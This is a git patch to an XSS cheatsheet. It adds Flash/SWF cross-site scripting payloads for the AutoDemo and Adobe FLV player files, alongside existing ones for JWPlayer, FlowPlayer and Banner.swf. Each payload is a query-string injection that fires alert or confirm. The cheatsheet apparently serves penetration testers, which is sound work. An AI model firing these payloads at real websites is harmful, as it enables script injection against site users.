From 74b9508019a8872b0a877478b8f3cd9f1a43dd6a Mon Sep 17 00:00:00 2001
From: Yasin Soliman <yasinS@users.noreply.github.com>
Date: Sun, 1 Oct 2017 10:19:34 +0100
Subject: [PATCH] [XSS] add extra SWF refs from notes

---
 cheatsheets/xss.md | 6 +++++-
 1 file changed, 5 insertions(+), 1 deletion(-)

diff --git a/cheatsheets/xss.md b/cheatsheets/xss.md
index 9fd8b26..c2d7b76 100644
--- a/cheatsheets/xss.md
+++ b/cheatsheets/xss.md
@@ -128,6 +128,10 @@ javas&#x09;cript://www.google.com/%0Aalert(1)
 
 - Open Flash Chart: `open-flash-chart.swf?get-data=(function(){alert(1)})()`
 
+- AutoDemo: `control.swf?onend=javascript:alert(1)//`
+
+- Adobe FLV Progressive: `/main.swf?baseurl=asfunction:getURL,javascript:alert(1)//` and `/FLVPlayer_Progressive.swf?skinName=asfunction:getURL,javascript:alert(1)//`
+
 - Banner.swf (generic): `banner.swf?clickTAG=javascript:alert(document.domain);//`
 
 - JWPlayer (legacy): `player.swf?playerready=alert(document.domain)` and `/player.swf?tracecall=alert(document.domain)`
@@ -136,7 +140,7 @@ javas&#x09;cript://www.google.com/%0Aalert(1)
 
 - FlowPlayer 3.2.7: `flowplayer-3.2.7.swf?config={"clip":{"url":"http://edge.flowplayer.org/bauhaus.mp4","linkUrl":"JavaScriPt:confirm(document.domain)"}}&.swf`
 
-_Note: Useful reference on SWF XSS construction from [MWR Labs](https://labs.mwrinfosecurity.com/blog/popping-alert1-in-flash/)._
+_Note: Useful reference on constructing Flash-based XSS payloads from [MWR Labs](https://labs.mwrinfosecurity.com/blog/popping-alert1-in-flash/)._
 
 **Lightweight Markup Languages**